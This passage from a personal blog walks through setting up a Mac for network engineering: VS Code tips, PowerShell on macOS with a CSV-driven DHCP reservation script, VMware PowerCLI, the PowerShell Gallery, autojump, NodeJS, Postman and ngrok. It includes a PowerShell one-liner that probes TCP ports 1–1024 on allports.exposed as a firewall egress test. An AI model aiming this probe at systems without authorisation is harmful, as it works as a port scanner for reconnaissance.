names and you can instantly jump to them. In the screenshot above, you can see that the cursor is on the variable "fabric". I jumped to fabric by clicking on the Icon that looks like a rectangle just above the code window. That generates a drop down list of variables in the program, select the one you want and it jumps to it.<br /></div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiSx5J2hxNAWJ8gXX4afLnhtFdUTT-q1W4Nqzj_L6SHK4Hbq9zm6niGDVZc5hCPvCpqmZlziLzQw8gap0f2Qsm7qKkMcJeBS7jlUvNX23_bPUOzrDUjWF_iJjK2VWvLZgzecxkPUUgsDZnoxd_oO-4LWMK5S4vjlSZ2fegECUcuDCaWZ3P2sYMPE8WqjQ=s644" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="644" height="118" src="https://blogger.googleusercontent.com/img/a/AVvXsEiSx5J2hxNAWJ8gXX4afLnhtFdUTT-q1W4Nqzj_L6SHK4Hbq9zm6niGDVZc5hCPvCpqmZlziLzQw8gap0f2Qsm7qKkMcJeBS7jlUvNX23_bPUOzrDUjWF_iJjK2VWvLZgzecxkPUUgsDZnoxd_oO-4LWMK5S4vjlSZ2fegECUcuDCaWZ3P2sYMPE8WqjQ=w485-h118" width="485" /></a></div><br /><div style="text-align: left;"><br /></div><h4 style="text-align: left;">How to disable telemetry reporting</h4><div><b>Note:</b> I leave this enabled so that MS can improve the product. If that is disagreeable to you, follow these steps to disable it.<br /><br /></div><div>VS Code collects usage data and sends it to Microsoft to help improve our products and services. Read our privacy statement and telemetry documentation to learn more.</div><div><br /></div><div>If you don't want to send usage data to Microsoft, you can set the telemetry.telemetryLevel user setting to off.</div><div><br /></div><div>From File > Preferences > Settings (macOS: Code > Preferences > Settings), search for telemetry, and set the Telemetry: Telemetry Level setting to off. This will silence all telemetry events from VS Code going forward.</div><div><br /></div><div>Important Notice: VS Code gives you the option to install Microsoft and third-party extensions. These extensions may be collecting their own usage data and are not controlled by the telemetry.telemetryLevel setting. Consult the specific extension's documentation to learn about its telemetry reporting.</div><div><br /></div><h4 style="text-align: left;">Sync Settings to multiple laptops</h4><div>VS Code has a built-in method to sync settings between multiple machines. Obviously useful if you develop on more than one machine.</div><div><br /></div><div>Click the gear icon on the bottom left of the screen, select "Turn on Settings Sync...". </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkrGGPy_ev5IFdLiLOH6BUvVWInhwgRIPSMBJo7hFlBDY_Z-4RUxxRuOCPrJM-f_p4YjjXuLefZyG8J8UwtW4fRxyOIO7q_FdoXgpJ6UjAe0gC5lwj7oQHeQwnV-zGqTTqEoiuKITzv6OI2tO9QYAiCyMX5btDceE2BZjgQ7VvcbPiGjStQHrW2rsLCw/s1478/Screen%20Shot%202022-04-19%20at%2019.00.02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="1478" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkrGGPy_ev5IFdLiLOH6BUvVWInhwgRIPSMBJo7hFlBDY_Z-4RUxxRuOCPrJM-f_p4YjjXuLefZyG8J8UwtW4fRxyOIO7q_FdoXgpJ6UjAe0gC5lwj7oQHeQwnV-zGqTTqEoiuKITzv6OI2tO9QYAiCyMX5btDceE2BZjgQ7VvcbPiGjStQHrW2rsLCw/w478-h166/Screen%20Shot%202022-04-19%20at%2019.00.02.png" width="478" /></a></div><br /><div><br /></div><div><br /></div><div>You will have to log in using a Github or MS account. </div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2mpzZ-zHpcP_rx4M4WXywaxquh8Pbrs-9ss3JZieQQk8lvlGdrC6B_oGfA7Knc_lHYgaoy6T4KY0G6KeLM_x8MS0Pb7F48J7znYpOuOO4xAQ32VqSofpGavUvH6BFiIqKc1zQVUGhmeSu6FT9Sj2MPH_JVZI02Ea7BijlfaOndmUmFK500jKIFlLVog/s1476/Screen%20Shot%202022-04-19%20at%2019.03.09.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="284" data-original-width="1476" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2mpzZ-zHpcP_rx4M4WXywaxquh8Pbrs-9ss3JZieQQk8lvlGdrC6B_oGfA7Knc_lHYgaoy6T4KY0G6KeLM_x8MS0Pb7F48J7znYpOuOO4xAQ32VqSofpGavUvH6BFiIqKc1zQVUGhmeSu6FT9Sj2MPH_JVZI02Ea7BijlfaOndmUmFK500jKIFlLVog/w486-h94/Screen%20Shot%202022-04-19%20at%2019.03.09.png" width="486" /></a></div><div><br /></div><div><br /></div><div>A new browser window will open so that you can log in. After signing in, Settings Sync will be turned on and continue to synchronize your preferences automatically in the background. </div><div><br /></div><h4 style="text-align: left;">Syncing a second laptop</h4><div>Since syncing can involve conflicts you will have to make a choice when you set up the second laptop.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPuHpiU0sdfXFagZSa5vcWsmxPGM0wAFKV3LI4hqs6FxGrQw4aS44LW8b0uqgG1kBG9lejs5YE68hnqgBnu83ASc1R-4VS5y1N2cZV2BobN0bmbW1HdkeZsf1xsuZm0lhYSNPLbxL10RzZfgJWBrsu-vTxxIJPJrjVtELDZyjnOA0y7hp9IVBBFPCEhQ/s1506/Screen%20Shot%202022-04-19%20at%2019.05.30.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="756" data-original-width="1506" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPuHpiU0sdfXFagZSa5vcWsmxPGM0wAFKV3LI4hqs6FxGrQw4aS44LW8b0uqgG1kBG9lejs5YE68hnqgBnu83ASc1R-4VS5y1N2cZV2BobN0bmbW1HdkeZsf1xsuZm0lhYSNPLbxL10RzZfgJWBrsu-vTxxIJPJrjVtELDZyjnOA0y7hp9IVBBFPCEhQ/w468-h235/Screen%20Shot%202022-04-19%20at%2019.05.30.png" width="468" /></a></div><br /><div><br /></div><h4 style="text-align: left;">Reference</h4><div><a href="https://code.visualstudio.com/docs/supporting/faq#_resolving-shell-environment-fails">Visual Studio Code FAQ</a></div><div><a href="https://devblogs.microsoft.com/python/python-in-visual-studio-code-december-2021-release/">Python in Visual Studio Code – December 2021 Release</a><br /></div><div><a href="https://devblogs.microsoft.com/python/pylance-has-reached-stable/#code-navigation">The Pylance language server has reached stable!</a><br /><a href="https://www.freakyjolly.com/top-and-best-vs-visual-studio-code-themes/">Top and Trending VS Code Themes of 2021</a><br /></div><div><a href="https://code.visualstudio.com/docs/editor/settings-sync">Settings Sync</a><br /></div></div><h4 id="powershell" style="text-align: left;"><br /></h4><h3 style="text-align: left;">Powershell</h3><div>Microsoft open-sourced Powershell a while back. I usually install it on Linux, I have found that scripts that don't access a drive letter usually work on Linux. There is one script from Black Hills Information Security that I use all the time. You can read about it <a href="https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/">here</a></div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background-color: #f0f3f3; background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #ff6600;">1.</span><span style="color: #555555;">.</span><span style="color: #ff6600;">1024</span> <span style="color: #555555;">|</span> <span style="color: #555555;">%</span> {<span style="background-color: #ffaaaa; color: #aa0000;">$</span>test<span style="color: #555555;">=</span> new<span style="color: #555555;">-</span><span style="color: #336666;">object</span> system<span style="color: #555555;">.</span>Net<span style="color: #555555;">.</span>Sockets<span style="color: #555555;">.</span>TcpClient; <span style="background-color: #ffaaaa; color: #aa0000;">$</span>wait <span style="color: #555555;">=</span> <span style="background-color: #ffaaaa; color: #aa0000;">$</span>test<span style="color: #555555;">.</span>beginConnect(<span style="color: #cc3300;">"allports.exposed"</span>,<span style="background-color: #ffaaaa; color: #aa0000;">$</span>_,<span style="background-color: #ffaaaa; color: #aa0000;">$</span>null,<span style="background-color: #ffaaaa; color: #aa0000;">$</span>null); (<span style="background-color: #ffaaaa; color: #aa0000;">$</span>wait<span style="color: #555555;">.</span>asyncwaithandle<span style="color: #555555;">.</span>waitone(<span style="color: #ff6600;">250</span>,<span style="background-color: #ffaaaa; color: #aa0000;">$</span>false)); <span style="color: #006699; font-weight: bold;">if</span>(<span style="background-color: #ffaaaa; color: #aa0000;">$</span>test<span style="color: #555555;">.</span>Connected){echo <span style="color: #cc3300;">"$_ open"</span>}<span style="color: #006699; font-weight: bold;">else</span>{echo <span style="color: #cc3300;">"$_ closed"</span>}} <span style="color: #555555;">|</span> select<span style="color: #555555;">-</span>string <span style="color: #cc3300;">" "</span>
</pre></div>
<div><br /></div><div><br /></div><div><b>Installation</b></div><div><br /></div><div>brew install --cask powershell</div><div><br /></div><div>After the install finishes you will need to update the help file.</div><div><br /></div><div>update-help</div><div><br /></div><div>Powershell is installed into this folder:</div><div>/usr/local/microsoft/powershell/7</div><div><br /></div><div><br /></div><div><b>Running Powershell</b></div><div>Open a new tab in iTerm2 and enter:</div><div><b>pwsh</b> </div><div><br /></div><div>Here is a link to a simple PowerShell script I wrote to create DHCP reservations for printers. It ran perfectly on macOS:</div><div><a href="https://github.com/rikosintie/Printer-DHCP">Printer-DHCP</a><br /></div><div><br /></div><div>Today I needed to create DHCP reservations for some Access Points. I had the script above but I wanted to read the data from a CSV file. Here is the script modified to read the data from a CSV file.</div><div><br />
<!--HTML generated using hilite.me--><div style="background-color: #f0f3f3; background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #006699; font-weight: bold;">param</span>(<span style="color: #336600;">[string]</span><span style="color: #003333;">$server</span> = <span style="color: #cc3300;">"server"</span>, <span style="color: #336600;">[string]</span><span style="color: #003333;">$scope</span> = <span style="color: #cc3300;">"scope"</span>)
<span style="color: #003333;">$a</span> = <span style="color: #336666;">Import-Csv</span> DHCP.csv
<span style="color: #006699; font-weight: bold;">foreach</span> (<span style="color: #003333;">$item</span> <span style="color: #006699; font-weight: bold;">in</span> <span style="color: #003333;">$a</span>) {
<span style="color: #003333;">$ip</span>=$(<span style="color: #003333;">$item</span>.IP)
<span style="color: #003333;">$mac</span>=$(<span style="color: #003333;">$item</span>.MAC)
<span style="color: #0099ff; font-style: italic;">#remove colons since MS DHCP can't deal with a real mac address</span>
<span style="color: #003333;">$mac</span>=<span style="color: #003333;">$mac</span><span style="color: #555555;">-replace</span><span style="color: #cc3300;">'[:]'</span>
<span style="color: #003333;">$name</span> = $(<span style="color: #003333;">$item</span>.<span style="color: #cc3300;">"AP-Name"</span>)
<span style="color: #336666;">write-host</span> <span style="color: #cc3300;">"netsh dhcp server $server scope $scope add reservedip $ip $mac $name"</span>
}
</pre></div>
</div><div><br /></div><div><br /></div><div>I created an Excel sheet like this:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7cEEcdeskDP7AeMwNYSTeOXpAhUzpNwiyquFyh44Xrnul2O8HgSGl9fT4zZxULyjyevdiFohM05_SEY0eNHp-CMcC_8beI54kSvBQ9Dv2XN9rqogRfbMDUJ8EAB2-hlZHD-KcAIbF47n/s500/Screen+Shot+2021-05-17+at+22.25.12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="250" data-original-width="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7cEEcdeskDP7AeMwNYSTeOXpAhUzpNwiyquFyh44Xrnul2O8HgSGl9fT4zZxULyjyevdiFohM05_SEY0eNHp-CMcC_8beI54kSvBQ9Dv2XN9rqogRfbMDUJ8EAB2-hlZHD-KcAIbF47n/s320/Screen+Shot+2021-05-17+at+22.25.12.png" width="320" /></a></div><br /><div>Notice that the first MAC address doesn't have colons. When I get an asset sheet from my office the MAC addresses don't have colons. The script removes colons if they are there.</div><div><br /></div><div><br /></div><div>Here is the output:</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background-color: #f0f3f3; background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">PS <span style="color: #555555;">/</span>Users<span style="color: #555555;">/</span>mhubbard<span style="color: #555555;">/</span>GoogleDrive<span style="color: #555555;">/</span>Test<span style="color: #555555;">/</span>configs<span style="color: #555555;">></span> <span style="color: #555555;">./</span>dhcp<span style="color: #555555;">-</span>csv<span style="color: #555555;">.</span>ps1 <span style="color: #555555;">-</span>server <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.221</span> <span style="color: #555555;">-</span>scope <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.0</span>
netsh dhcp server <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.221</span> scope <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.0</span> add reservedip <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.100</span> a44c1138fa5b AP1
netsh dhcp server <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.221</span> scope <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.0</span> add reservedip <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.101</span> <span style="color: #ff6600;">04</span>d5900e779b AP2
netsh dhcp server <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.221</span> scope <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.0</span> add reservedip <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.102</span> b0faebdde8a6 AP3
netsh dhcp server <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.221</span> scope <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.0</span> add reservedip <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.103</span> a44c1138fa59 AP4
netsh dhcp server <span style="color: #ff6600;">192.168</span><span style="color: #555555;">.</span><span style="color: #ff6600;">10.221</span> scope <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.0</span> add reservedip <span style="color: #ff6600;">10.112</span><span style="color: #555555;">.</span><span style="color: #ff6600;">105.104</span> <span style="color: #ff6600;">5057</span>a86e4b49 AP5
</pre></div>
<div><br /></div><div>I know that you could do the same thing in Python. But most customers are on Windows and Python isn't installed by default but PowerShell is. If you use PowerShell you can give the script to any Windows user and they can run it.</div><div><br /></div><div><b>Note</b>: Guido Von Rossum, the inventor of Python, now works at Microsoft! Maybe Python will be installed by default in the future.</div><div><br /></div><div>The PowerShell ISE isn't available on macOS but Microsoft has a plugin for Visual Studio Code. The link to how to install the plugin is in the references below.</div><div><br /></div><div>This article gives some tips on writing PowerShell scripts that work on Windows/Mac/Linux</div><div><br /></div><div><b>VMWare PowerCLI</b></div><div>One advantage of Microsoft open sourcing PowerShell is that VMWare's PowerCLI modules can be used on macOS and Linux! From inside PowerShell run the following to install PowerCLI:</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">Install<span style="color: #555555;">-</span>Module <span style="color: #555555;">-</span>Name VMware.PowerCLI
</pre></div>
<div><br /></div><div>You will be prompted that the repository isn't trusted. The modules are being pulled from the PowerShell gallery. If you don't trust it you can use the link below to download the raw files and inspect them before installing them. You can also use that method to install them on a server without Internet access.</div><div><br /></div><div>Zip file with the modules: <a href="https://developer.vmware.com/web/tool/vmware-powercli">VMware PowerCLI</a></div><div>VMWare's installation guide is here: <a href="https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.esxi.install.doc/GUID-F02D0C2D-B226-4908-9E5C-2E783D41FE2D.html">Install PowerCLI</a></div><div>VMWare's PowerCLI User's Guide can be downloaded here: <a href="https://developer.vmware.com/docs/12648/powercli-12-1-0-user-s-guide">PowerCLI 12.1.0 User's Guide</a></div><div><br /></div><div>Since VMWare is the 800 pound gorilla of Enterprise virtualization, there is a vast amount of resources on the Internet. This blog is a great introduction to installing and using PowerCLI</div><div><br /></div><div><a href="https://www.altaro.com/vmware/vmware-powercli-guide/">Getting Started with VMware PowerCLI – A Beginner’s Guide</a><br /></div><div><br /></div><div>Connecting to a vCenter server</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #330099; font-weight: bold;">Connect-VIServer</span> <span style="color: #330099; font-weight: bold;">-Server</span> <span style="color: #330099; font-weight: bold;">10</span><span style="color: #00aa88; font-weight: bold;">.23.112.235</span> <span style="color: #330099; font-weight: bold;">-Protocol</span> <span style="color: #330099; font-weight: bold;">https</span> <span style="color: #330099; font-weight: bold;">-Username</span> <span style="color: #cc3300;">'Adminis!ra!or'</span> <span style="color: #330099; font-weight: bold;">-Password</span> <span style="color: #cc3300;">'pa$$word'</span>
</pre></div>
<div><br /></div><div> <br /><h4 style="text-align: left;">PowerShell path on macOS</h4>For some reason the PowerShell install didn't add the path. PowerShell is installed at:</div><div><br /></div><div><b>$HOME/.local/share/powershell</b></div><div><br /></div><div>and scripts are installed at</div><div><br /></div><div><b>$HOME/.local/share/powershell/Scripts</b><br /><br />From inside the PowerShell terminal, you can use:<br /> <br /><b>$Env:PATH </b></div><div><br /></div><div>To display the current path.</div><div><br /></div><div>You can add the path to the PowerShell profile using:<br /><br /><b>nano $PROFILE</b><br /><br />To open the profile, then:<br /><br />$Env:PATH += ":$HOME/.local/share/powershell/Scripts"</div><div><br /></div><div>to add the path. You will need to close and re-open the PowerShell terminal.</div><div><br /></div><h3 style="text-align: left;">PowerShell Gallery</h3><div>Microsoft maintains a "Gallery" of PowerShell scripts. Some are written by Microsoft, and others are provided by the community. </div><div><br />MS provides quite a bit of documentation for the Gallery. This link is a good place to start<br /><br /><a href="https://learn.microsoft.com/en-us/powershell/scripting/gallery/overview?view=powershell-7.3">PowerShell Gallery</a><br /></div><div><br /></div><div>You can view the repositories that are installed in PowerShell using "Get-PSRepository"</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhnwcq2Bw2EaGMqLCnpGiLZKIzODwyQkpwOEA8tVkO2I-X6FyCUUgW_SkoQMdXhDfB6kSToaFyIFdBrwHxFv9haeLYfSntiPPK8oQwyapAC7GCF5wOZK0lYwp9X576WkFo3_lNsymJJW5g9uxJJtR_AAN3UWLw6IupUPNUGFp2K8gdnitNE4mz6urAOQ/s844/Screen%20Shot%202023-04-09%20at%2011.12.49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="121" data-original-width="844" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhnwcq2Bw2EaGMqLCnpGiLZKIzODwyQkpwOEA8tVkO2I-X6FyCUUgW_SkoQMdXhDfB6kSToaFyIFdBrwHxFv9haeLYfSntiPPK8oQwyapAC7GCF5wOZK0lYwp9X576WkFo3_lNsymJJW5g9uxJJtR_AAN3UWLw6IupUPNUGFp2K8gdnitNE4mz6urAOQ/w538-h77/Screen%20Shot%202023-04-09%20at%2011.12.49.png" width="538" /></a></div><br /><div>As you can see, I just have the default repository from Microsoft. And you can see that the Installation Policy is untrusted. When you install a script from the Gallery you will be prompted that the repository is untrusted.<br /><br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kazRWqvVwMOKvBdid-gQG_HiiqRDAi_2HliUTDp8zIuu_WWl5wbR4pxa61smsAfsPWSDMiUlc_KYU2FGrgZW1tYfsNjH9N8R94BuonnRwF9Ox1Hlo0m4IMfkzrJifnQRBM5-QWMKCCFQExFPigQpyF90uONyd9J7-xfEFJjDiGAfVOb0NMWP5K4nOw/s940/Screen%20Shot%202023-04-09%20at%2011.16.01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="141" data-original-width="940" height="81" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5kazRWqvVwMOKvBdid-gQG_HiiqRDAi_2HliUTDp8zIuu_WWl5wbR4pxa61smsAfsPWSDMiUlc_KYU2FGrgZW1tYfsNjH9N8R94BuonnRwF9Ox1Hlo0m4IMfkzrJifnQRBM5-QWMKCCFQExFPigQpyF90uONyd9J7-xfEFJjDiGAfVOb0NMWP5K4nOw/w541-h81/Screen%20Shot%202023-04-09%20at%2011.16.01.png" width="541" /></a></div><div><br /></div>I entered y to allow the installation to continue. You can use the "Set-PSRepository" command to trust the repository. I chose not to since there are a lot of community-provided scripts and I don't know how deep MS looks at the code.<br /><br /><br /><b>DSC - Desirable State Configuration</b><div>I saw a lot of scripts listed at "DSC" which I found stands for Desirable State Configuration. I didn't dig into it since I don't build Windows machines, but they appear to be scripts that install roles and configure Windows per MS best practices.<br /><br /><div><br /></div><div><b>Finding Scripts</b></div><div>You can go to the <a href="https://www.powershellgallery.com/">PowerShell Gallery Homepage</a> and browse/search for scripts. I went there and searched for "dhcp". It returned two pages of scripts! <br /><br />You an also search from the terminal:<br /><br /></div><div><b>Find-Script </b></div><div>with no arguments will return all scripts, but there are so many you will have to put them into a text file to be useful.</div><div><br /></div><div>If you know the EXACT name of the script you can use the -name argument. In this example I knew that the script I wanted to install is called "Ping-MultipleHosts"<br /><br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7HBJ3-htwj8sjusZLUy_WH9iaRh6-twUvypCvgXWE6XVbgGLuyIgacQYpBT_AYY1qITM3jTUVAWw8UsTCHLI9HTfhhtE8leCTSmBa3z23ZwlqOGFKynJ4Z039SlxBsWQdj5lTC6bh6vy_ua3KBTuewQi8N2EsRra7apH1mTQlvyvCj6MWYbqWtQmQeg/s1906/Screen%20Shot%202023-04-09%20at%2010.06.54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="230" data-original-width="1906" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7HBJ3-htwj8sjusZLUy_WH9iaRh6-twUvypCvgXWE6XVbgGLuyIgacQYpBT_AYY1qITM3jTUVAWw8UsTCHLI9HTfhhtE8leCTSmBa3z23ZwlqOGFKynJ4Z039SlxBsWQdj5lTC6bh6vy_ua3KBTuewQi8N2EsRra7apH1mTQlvyvCj6MWYbqWtQmQeg/w543-h66/Screen%20Shot%202023-04-09%20at%2010.06.54.png" width="543" /></a></div><div><br /></div><div>I have found that the community scripts are hosted on GitHub and there is a link on the Gallery page that takes you to the project homepage. I like to go there and review the code before I install it. More to learn than to see if it's malicous.</div><div><br /></div>Once you find the script in the gallery run "Install-Script":<div><b>Install-Script Ping-MultipleHosts</b><br /><div><br /></div><div>This will download the script to:</div><div><br /></div><div>$HOME/.local/share/powershell/Scripts</div><div><br /></div><div><div>➜ <b>ls $HOME/.local/share/powershell/Scripts</b></div><div>InstalledScriptInfos<span style="white-space: pre;"> </span><span style="color: red;">Ping-MultipleHosts.ps1</span></div></div><div><br /></div><div>Then execute the script:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEildTi5HY6uyrGEN-MsAN5fJVHeespwNS4gZiQl_DufD0vTUyl2gPX4cPno9J-5XM7cbJlZ4mwcDZMY-jw1AiMMCBOW9xtyu7ztYMd2g7f6a_yXVOrtpJgS2q_VccXg_cnNDNRvd-kmRNc2LIVLtqqRCo8lk_KiL331St6ftf-eu7yogFmpDM_6MAy-BA/s528/Screen%20Shot%202023-04-09%20at%2011.10.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="528" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEildTi5HY6uyrGEN-MsAN5fJVHeespwNS4gZiQl_DufD0vTUyl2gPX4cPno9J-5XM7cbJlZ4mwcDZMY-jw1AiMMCBOW9xtyu7ztYMd2g7f6a_yXVOrtpJgS2q_VccXg_cnNDNRvd-kmRNc2LIVLtqqRCo8lk_KiL331St6ftf-eu7yogFmpDM_6MAy-BA/w379-h140/Screen%20Shot%202023-04-09%20at%2011.10.56.png" width="379" /></a></div><br /><div><br />There is a lot more to PowerShell and now that it works on Linux/Mac, it is well worth the time to learn some. I am working on some PowerShell tools that will aid in deploying Dynamic Arp Inspection on switches. I created this GitHub repo if you are interested in looking at them.</div><div><br /></div><div><a href="https://github.com/rikosintie/Printer-DHCP">DHCP scripts for Networking</a><br /><br /><br /></div><div><br /></div><div><a href="https://powershell.org/2019/02/tips-for-writing-cross-platform-powershell-code/">Tips for Writing Cross-Platform PowerShell Code</a><br /></div><div><br /></div><div><b>Reference</b></div><div><a href="https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-macos?view=powershell-7.1">Installing PowerShell on macOS</a><br /></div><div><a href="https://www.sans.org/blog/getting-started-with-powershell/">Month of PowerShell: 5 Tips for Getting Started with PowerShell</a><br /></div><div><a href="https://www.sans.org/blog/discoveries-month-of-powershell/">Month of PowerShell - Discoveries from the Month of PowerShell</a><br /></div><div><a href="https://www.sans.org/blog/keyboard-shortcuts-boss/">Month of PowerShell - Keyboard Shortcuts Like a Boss</a><br /></div><div><a href="https://psframework.org/documentation/documents/psmoduledevelopment/templates.html">Powershell Template Development</a><br /></div><div><a href="https://docs.microsoft.com/en-us/powershell/scripting/dev-cross-plat/vscode/using-vscode?view=powershell-7.1">Using Visual Studio Code for PowerShell Development</a><br /></div><div><a href="https://stackoverflow.com/questions/46286784/read-data-from-csv-file-using-powershell-and-strore-each-line-data-in-an-array">read data from csv file using powershell and strore each line data in an array</a><br /></div><div><a href="http://woshub.com/manage-windows-firewall-powershell/">Manage Windows Firewall with PowerShell</a><br /></div><div><a href="https://ohmyposh.dev/docs/pwsh">Oh My Posh - Similar to Oh My ZSH for Powershell</a><br /></div><div><a href="https://ohmyposh.dev/docs/fonts">You need to install Nerd Fonts to use POSH</a><br /></div><div><a href="https://github.com/WiredPulse/PoSh-R2">PoSh-R2PowerShell - Rapid Response (PoSH-R2)... For the incident responder in you!</a><br /></div><div><a href="https://vdc-download.vmware.com/vmwb-repository/dcr-public/0ab29b57-38e8-43d0-8761-e4044dde1e9c/cd8ad796-46fb-4859-bdfd-32020dc0a5b2/powercli125-compat-matrix.html#install-prereq">Compatibility Matrixes for VMware PowerCLI 12.5.0</a><br /></div><div><a href="https://vdc-download.vmware.com/vmwb-repository/dcr-public/02623a82-abc4-421c-a788-87578bd66208/5ccd816b-9aa4-4914-9e1d-dabacc9fd386/vmware-powercli-125-release-notes.html">VMware PowerCLI 12.5.0 Release Notes</a><br /></div><div><br /></div><h3 id="autojump" style="text-align: left;"><br /></h3><h3 id="autojump" style="text-align: left;">Autojump</h3><p>https://github.com/wting/autojump</p><p>autojump is a faster way to navigate your filesystem. It works by maintaining a database of the directories you use the most from the command line. Directories must be visited first before they can be jumped to.</p><p><b>Installation</b></p><p>brew install autojump</p><p>Add</p><p>[ -f /usr/local/etc/profile.d/autojump.sh ] && . /usr/local/etc/profile.d/autojump.sh</p><p>To the .zshrc file</p><p>Remember, you can type ec [enter] to open the .zshrc file in VScode.</p><div style="box-sizing: border-box; font-family: "Segoe UI", system-ui, "Apple Color Emoji", "Segoe UI Emoji", sans-serif; font-size: 14px; font-variant-ligatures: normal; orphans: 2; widows: 2;"><div>Example, from my home folder</div><div>j pro<br />/Users/mhubbard/GoogleDrive/Python/Scripts/prod<br />➜ prod git:(master) ✗</div><div><br /></div></div><h3 id="nodejs" style="text-align: left;">NodeJS</h3><p>If you are planning to get Cisco's DevNet cert you need NodeJS.</p><p><b> brew install node</b></p><p>A lot of information scrolls past during the install. I didn't do any of the suggested modifications to my path. I saved the messages so if I run into issues I can follow the suggestions.</p><p><br /></p><h3 id="postman" style="text-align: left;"><b>Postman</b></h3><p>Postman is a tool for working with RESTful APIs. You will need it if you are working on the Cisco DevNet cert or just using a REST API on a switch.</p><p><a href="https://www.postman.com/downloads/">Download Postman</a><br /></p><p>Install the package as normal. </p><p>Open Postman and follow the instructions to create an account</p><p><br /></p><h3 id="ngrok" style="text-align: left;">Ngrok</h3><p>From the ngrok website</p><p>Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.</p><p>You will need ngrok if you are working on the Cisco DevNet cert</p><p><b>brew install --cask ngrok</b></p><p>Verify</p><p><b> 